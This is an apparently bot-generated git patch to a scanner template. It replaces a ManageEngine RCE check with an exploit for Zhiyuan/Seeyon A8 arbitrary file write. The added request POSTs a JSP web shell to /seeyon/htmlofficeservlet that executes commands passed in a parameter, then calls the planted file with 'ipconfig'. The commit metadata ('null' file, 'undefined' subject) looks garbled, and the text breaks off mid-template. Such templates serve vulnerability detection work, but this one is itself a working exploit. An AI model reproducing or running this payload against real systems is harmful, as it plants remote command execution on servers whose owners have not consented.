From 9cce22a529f5f77e1ae1bf3d436c8aba4d840ef4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 9 May 2022 10:44:57 -0400
Subject: [PATCH] Enhancement: undefined by cs
---
 null | 61 ++++++++++++++++++++++++++++++++++++++----------------------
 1 file changed, 39 insertions(+), 22 deletions(-)
diff --git a/null b/null
index 5dc2171def..eaf0d56558 100644
--- a/null
+++ b/null
@@ -1,32 +1,49 @@ -id: CVE-2021-44077 +id: CNVD-2019-19299 info: - name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution - author: Adam Crosser,gy741 + name: Zhiyuan A8 Arbitrary File Write (RCE) + author: daffainfo severity: critical - description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. reference: - - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a - - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ - - https://github.com/horizon3ai/CVE-2021-44077 - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb - classification: - cve-id: CVE-2021-44077 - tags: cve,cve2021,cisa,zoho,manageengine,rce + - https://www.cxyzjd.com/article/guangying177/110177339 + - https://github.com/sectestt/CNVD-2019-19299 + tags: zhiyuan,cnvd,cnvd2019,rce requests: - - method: GET - path: - - "{{BaseURL}}/RestAPI/ImportTechnicians" + - raw: + - | + POST /seeyon/htmlofficeservlet HTTP/1.1 + Host: {{Hostname}} + Pragma: no-cache + Cache-Control: no-cache + Upgrade-Insecure-Requests: 1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3 + Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 + Connection: close - matchers-condition: and + DBSTEP V3. 
0 343 0 658 DBSTEP=OKMLlKlV + OPTION=S3WYOSWLBSGr + currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 + = WUghPB3szB3Xwg66 the CREATEDATE + recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6 + originalFileId = wV66 + originalCreateDate = wUghPB3szB3Xwg66 + FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs + needReadFile = yRWZdAS6 + originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4 + <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce + + - | + GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 + Host: {{Hostname}} + + req-condition: true matchers: - - type: word - words: - - '